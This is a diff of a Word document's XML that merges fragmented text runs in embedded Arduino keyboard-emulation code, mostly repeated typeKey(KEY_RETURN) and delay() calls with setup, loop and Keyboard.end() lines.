-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20368,25 +20150,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20420,25 +20184,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20455,25 +20201,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20507,25 +20235,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20542,25 +20252,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20594,25 +20286,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20629,25 +20303,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20681,25 +20337,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20716,25 +20354,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20768,25 +20388,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20803,25 +20405,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20855,25 +20439,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20890,25 +20456,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20942,25 +20490,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -20977,25 +20507,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21029,25 +20541,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21064,25 +20558,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21116,25 +20592,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21151,25 +20609,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21203,25 +20643,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21238,25 +20660,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21290,25 +20694,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21325,25 +20711,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21377,25 +20745,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21412,25 +20762,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21464,25 +20796,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21525,25 +20839,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Keyboard.end(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>);</w:t>
+                              <w:t xml:space="preserve">  Keyboard.end();</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -21603,25 +20899,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">void </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>loop(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>) {}</w:t>
+                              <w:t>void loop() {}</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -21674,25 +20952,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">void </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>int key) {</w:t>
+                        <w:t>void typeKey(int key) {</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -21726,25 +20986,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>50);</w:t>
+                        <w:t xml:space="preserve">  delay(50);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -21804,25 +21046,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">void </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>setup(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>) {</w:t>
+                        <w:t>void setup() {</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -21899,25 +21123,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
